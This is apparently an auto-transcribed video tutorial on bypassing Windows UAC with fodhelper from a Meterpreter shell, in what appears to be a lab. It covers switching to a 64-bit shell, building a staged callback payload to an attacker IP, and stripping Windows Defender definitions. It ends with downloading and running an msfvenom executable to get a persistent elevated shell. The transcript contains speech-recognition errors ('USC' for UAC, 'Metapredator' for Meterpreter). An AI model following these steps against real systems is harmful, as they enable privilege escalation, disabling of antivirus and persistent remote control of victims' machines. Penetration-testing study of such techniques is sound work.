Hello everybody. This is another quick tutorial on USC bypass. It's basically second. I did a video on USC bypass using Fodhelper, but this is just another video to show or troubleshoot when you're having issues with trying to do a USC bypass with Fodhelper and you're finding that it's failing, and I'll demonstrate why this is failing and how to overcome this and how to fix this. So I'll quickly go through the demonstration just to go through what needs to be done. All right, cool. So I'll show. I've just got a shell here, a Metapredator shell, and if I do a session, you can see that we've got a Metapredator shell to this machine, and it's an x86, not a 64. So I've got this user gr.mount, and this is the machine here. So if I go to the sessions, and we'll just do migrate it to Notepad, execute, just to have a stable shell, execute -h -f notepad.exe. Just a minute, pause this here. Yep. And then we migrate to that process. I normally do this every time I get a Metapredator shell. 5424. Okay. And then now we go to the shell. So we go to shell, and that is the user. So if we try and see whether the user is a local admin, so if we go net local group, we'll see that this user here is a local admin, not the. But if we try and so as admin, we should be able to create a file inside the system32 file. So I'll actually go to PowerShell. So if I go to PowerShell, and if I try and run this file to create just a simple creating a new file inside system32, as admin you should be able to do it, but if you're not admin, so if I do that, so a new item path, we're trying to add a file 123.txt inside this folder. As admin we should. So if I do that, you see that it's saying permission denied. We can't do that. And if you want to enumerate UAC, you can run this command here as well. It's just getting a property in the. So if we do this, I'll put these commands in the description. So if you go to get path and then you go into this and then check for this, if you get 1, that means you've got USC bypass. Sorry, you've got USC enabled. But if you had 0, then you means that there's no USC. So that's probably why we can't do this. And then if we try and run the Fodhelper 3 commands, which is here, and this is probably what you'll be seeing when you're trying to do a USC bypass and you're getting an error. So if you try, these are the 3 lines, and I've already done a video on how to do this. And so if you run this first command, which modifies the path. So there's a video that I've gone through all this, so I'm not going to go through the explanation, but if you run these 3 lines, so this is the first line, and we're just going to put a placeholder command here called ipconfig, and if you do that, so that's the first command. Then if you do the second command, which is this one, that runs. But then now if you try and run the Fodhelper, this command here, this is where you get stuck. You get this error here and you're wondering why is this not working. Now I found out that the issue that this is not working is because we've got an x86 shell and not a 64-bit shell. So if you want to enumerate and see what kind of shell you've got, you can run this command here, environment spelling mistake. So environment is 64-bit process. It falls, so we're definitely running on x86 because we actually saw it on the Metabread as well. If you've got here as true, that means you're on a 64-bit shell. And if you try and search for this file here, the Fodhelper inside that particular folder, so we can use a PowerShell command to search for that. Just I've got the saved command rather than type everything. So if we try and search, we're trying to search for this inside this folder. We're trying to search for Fodhelper, and then if we run that, you see that it doesn't find anything. Yeah, but if you actually went into that machine and tried to search for the Fodhelper, you'll find that file that is there. Now, how do we go about fixing this? So first thing is to try and change this into into a 64-bit shell, and I found a very easy command on how to do that. So if you run this, if you go to see Windows system sysnative cmd.exe, I'm not sure that this will run in this PowerShell. If you do that, all right, there you go. Then if you try and run again, the environment is 64-bit process. Oh, sorry, let's go to PowerShell. We need to run this in PowerShell. And copy this. We see now we've got it's true, right? And you remember before we were running it and you were saying it's false, so that means we're on a 64-bit shell now. And if we try and do that same search which failed here, you see we didn't get anything when we tried to search for this file. So if we run the same command, you see it finds the file straight away, Fodhelper. Now we should be able to run this 3 commands again. And so this was the original command that we had here, the first command. And remember, I put a placeholder of the value here as ipconfig, but we're going to put our payload here rather than put ipconfig, and we're going to use shells to create the payload. So if I do, I'll create another. There's a video on this as well in one of my videos on how to use shells. So if I go to shell, just creating a payload. So if I go to number 1, if I put in my IP 192.168.56.100, I'll give it a 444 because we're using 1. I'll choose 12, which is a stage payload. We'll put to the temp folder that, and this is our payload here. So I'll copy this whole line here. And if I go, I'll split the screen so that we have it. Let me split it. I'll close this, and then I'll split this 2 ways. All right, so this is where we're gonna put the value. So it's value, I'll put the, and then I'll put I'll put all that command here, paste it there, and put another, and then dash false. So that's the first command. And then the second line, which is this. Again, there's a video about this on the original Fodhelper, so I'll put that there, run that. And now this, before we run this Fodhelper, the last command, which is this, before I run it, I need to serve that file, the csproj from temp. So I'll go to temp, cd, sorry, serve AG. So it's having the file, and then I'll set up a listener and see on port 444, and then we run this file at the top here now on our machine. And ideally you should see that it should serve a file here, and then you should get a listener here. And so if I run that, you see it uploaded that, and we should see a shell pop up here. Yep, there you go. And if you do that, and then if we try and enumerate again, if we've got UAC bypass, which is this, if we've got it at 0, then we know that it's not enabled. So if we do this, I'll close this so that it's clearer. That's the one. Still showing as 1, but if we try and upload a file here, we see we are able to upload that in there. I'm not sure why it showed this as 1, but you see now we can upload the file that we were not able to upload. If I try it, I'll try and do a new file in the original shell. At the top is our original shell, so if we do that, try and add a new file, you see that is permission denied. And if we do it down here, same exact file, command, paste it there. This file here. Let's run both of them again. So I'll copy that, try and run it in this original shell. Nope. And if we run it on our let me see. Oh, there you go. We'll do a new file again. Maybe call it 1234 1235. So I run this at the top here, 1235.txt, put it on 632. It should fail at the top here. That failed. And if we run this at the bottom here, it took it. And if we do an ls, you'll see all the files. Where was the file? In system 32, you'll see this file in here. But anyway, it did accept this file here. So again, that's a quick now from here we should be able to disable antivirus, and then I'll just quickly do how to get another method. And because we are admin, we should be able to disable the antivirus. And if this is a command here, so if we go into this folder, so if you go into this, you run this command, go into this Windows Defender, and then if you run this command, it removes the antivirus definitions. and that's done. And you would not be able to do it at the top here because of UAC as well. And now because we I'll quickly create I'll keep it vertically. CD. I just want to show how to get another metapredator shell, which now you can for persistence. If we go MS Venom, I'll use this, but I'll use this. Let's call it x.exe. It's a bit slow because I'm got quite a number of VMs running. What's happening? So I was having issues and I had to recreate the shell again. So I'm getting so basically we've done the USC bypass, but we want to get another metapredator shell. So I'll create an exploit with x64 metapredator. So do that. Called it x.exe 56.100. So yep, so if I do a serve 80, and if I go to, this is the shell that we've got USC bypass, remember? So if I go to cd to do cd temp, I normally like to make the temp cd temp invoke minus URI http one 192.168.100.56 and exp.exe minus alpha, and I just do it in that exp.exe. Sorry, it's 56.100. That should fail. There's a typo here, it should be 56.100. Yeah, and then if I run that, if I do an ls here, I'll then run that exp, and because we've got antivirus disabled, we should be able to run this, and we should get a metapredator shell here. Actually, if I background this one, if I do a control Z at the top here, yes, and if I bg this one as well, background that, and if I do, I'll just clear, and I just do sessions just to see what we have. You see we've got only one session. I can actually close this screen here because we've already saved the file. I'll close that one, and I'll just clear this so that we have a sessions, and if I do exp here, you get a new shell here, a new metapredator shell, and what happened? Because we need to, I know what happened, because we're running on a payload which is x66, so we'll start and we'll we'll change the payload. So again, sessions, and if I do show payload, sorry, I'll clear this. Show options. You can see the payload is this one, so we will set a different payload. So I'll copy this. So if I do set payload, paste, and if I go to here, Windows, x64, if I do exploit -z -j, if we have to stop that listener. So if I do this again, so I'll go jobs, -k0. So we've stopped that job, and then if we go we've changed the payload. I'll do the set payload again, Windows, x64, and exploit. Now we should be able to exploit -z -j because we stopped the listener. Yep, there you go. So if I do a clear sessions again, we see we only got one session here, and now we are listening on x64. So if I run that exploit again, that file x.exe, run it from here, x.exe. Yep, there you go. It's started, and there you go, and got a session there. And if we do here clear session, we should see two sessions, 186, 164. Yep, there you go. Same machine, same user, 186, 184, and we've got UAC bypass on. Yep, so we've got two shells. Again, I'll just show you sessions. And then if we've now got a persistent metapreter shell with UAC bypass. And if you want to test it again, if you go to sessions 3, and if I go to shell, if I go to PowerShell, and if I try and create a new file inside the system32, which we could not do before with our x86 shell, but now we've got and if we do that, create that file in there, we should see that we should be able to create it. Yep, and that means we've got UAC bypass persistent shell. So that's pretty much it. It's a quick demonstration. If you've got issues with UAC bypass, you will realize that you've got an x86 shell, a 32-bit shell. First thing you need to do is get a 64-bit shell, then run Fodhelper again, and then you will get you will be able to run it and then get a new shell. And that's pretty much it. Let me know if you've got any comments in the any questions. Feel free to reach out. That's it. Thanks.